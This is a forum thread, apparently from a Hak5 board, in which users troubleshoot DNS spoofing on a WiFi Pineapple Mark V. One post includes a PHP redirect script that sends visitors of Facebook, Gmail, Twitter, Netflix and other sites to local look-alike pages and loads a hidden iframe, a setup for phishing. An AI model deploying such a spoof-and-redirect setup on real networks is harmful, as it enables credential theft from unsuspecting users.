Pineapple Mark 5 dns spoof does not work

[SystemCrash86]

I got the new wifi pineapple mark 5 and everything works great, except for the dnsspoof - it just doesn't work at all.

Is this a common issue with the new pineapple or is it just me and is there a possible fix?

[no42]

It should work!

Its just the default index.php file (that your most likely hitting) is issuing a redirect to /redirect.php on the spoofed website.

so www.example.com becomes www.example.com/redirect.php

replace your /www/index.php with something static that you can easily identify; like pineapple_surprise ?

[SystemCrash86]

<?php
	$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];

	if (strpos($ref, "hotmail")){
	      header('Status: 302 Found');
		header('Location: hotmail.htm');
	}
       if (strpos($ref, "facebook")){
	      header('Status: 302 Found');
		header('Location: facebook.htm');
	}
       if (strpos($ref, "twitter")){
	      header('Status: 302 Found');
		header('Location: twitter.htm');
	}
       if (strpos($ref, "gmail")){
	      header('Status: 302 Found');
		header('Location: gmail.htm');
	}
       if (strpos($ref, "youtube")){
	      header('Status: 302 Found');
		header('Location: youtube.htm');
	}
         if (strpos($ref, "vimeo")){
	        header('Status: 302 Found');
		header('Location: vimeo.htm');
	}
         if (strpos($ref, "linkedin")){
	        header('Status: 302 Found');
		header('Location: linkedin.htm');
	}
         if (strpos($ref, "instagram")){
	        header('Status: 302 Found');
		header('Location: instagram.html');
	}
         if (strpos($ref, "plus.google")){
	        header('Status: 302 Found');
		header('Location: googleplus.htm');
	}
          if (strpos($ref, "netflix")){
	         header('Status: 302 Found');
		header('Location: netflix.htm');

        }
         if (strpos($ref, "ustream")){
	        header('Status: 302 Found');
		header('Location: ustream.htm');

        }
         if (strpos($ref, "dropbox")){
	        header('Status: 302 Found');
		header('Location: dropbox.htm');

        }

          if (strpos($ref, "blogger")){
	         header('Status: 302 Found');
		header('Location: blogger.htm');
        }
         if (strpos($ref, "outlook")){
	        header('Status: 302 Found');
		header('Location: outlook.htm');

        }

	require('error.php');

?>
<iframe style="display:none;" src="/get/get.php"></iframe>

This is my redirect.php - the only thing i changed, the error.php and the index.php remain untouched. It worked for my mark 4 so i assumed it would work for my mark 5 - was that an error on my part?

[thesugarat]

DNS Spoofing does work on the Mark 5. There are a few things you'll need to know though.

The Configuration Tile: DNS Spoof Tab has a bug in it. If you use that Tab to edit the Hosts or the index.php you files will end up with extra characters that look like this ^M. There will be one after each line. If you SSH in and delete those out it will start working.

The dnsspoof infusion does not add the extra characters but it does not support editing the index.php. Again, just SSH in.

[SystemCrash86]

I had a look at the Configuration Tile and DNS Spoof Tab and the Hosts or index.php have no extra characters at all - not even the ^M and the same thing in the dnsspoof infusion and all i changed was my redirect.php thats it thats all i changed and when i start dns spoof - either from the configuration tile or the actual dns spoof tile i get no errors at all. On my other pc i browse to the spoofed site e.g facebook, twitter and the actual site loads.

I haven't seen any extra characters

[barry99705]

I've not been able to get dnsspoof to forward to another site, just to the internal server. Not sure what's the issue.

[thesugarat]

SystemCrash86,

How did you check those files? The extra characters are not visible if you are only looking with the infusions. You have to SSH in to see them.

barry99705,

I got external working as well. To Bing actually, thanks for that idea. Extra points for evil. I think the only thing extra I've been doing is exiting the big tile after I start dnsspoof and then going back in so that it refreshes then going over to test that it's working.

[SystemCrash86]

SystemCrash86,

How did you check those files? The extra characters are not visible if you are only looking with the infusions. You have to SSH in to see them.

barry99705,

I got external working as well. To Bing actually, thanks for that idea. Extra points for evil. I think the only thing extra I've been doing is exiting the big tile after I start dnsspoof and then going back in so that it refreshes then going over to test that it's working.

I SSH'd into the pineapple and went to the www folder and checked the index.php file and other files in that folder and still nothing - did i miss something?

[thesugarat]

Nope that's the way to do it... I was worried you were only looking via the gui. What about the /etc/pineapple/spoofhost file?

[SystemCrash86]

Nope that's the way to do it... I was worried you were only looking via the gui. What about the /etc/pineapple/spoofhost file?

After i couldn't find anything in the www folder i looked at the /etc/pineapple/spoofhost file and found nothing except the hosts i want to dnsspoof, no extra characters or anything.

I'm very confused

[hfam]

There is already an entire thread on this issue. Please search the forums before starting another thread:

https://forums.hak5.org/index.php?/topic/30580-dns-spoof-not-spoofing-the-dnses/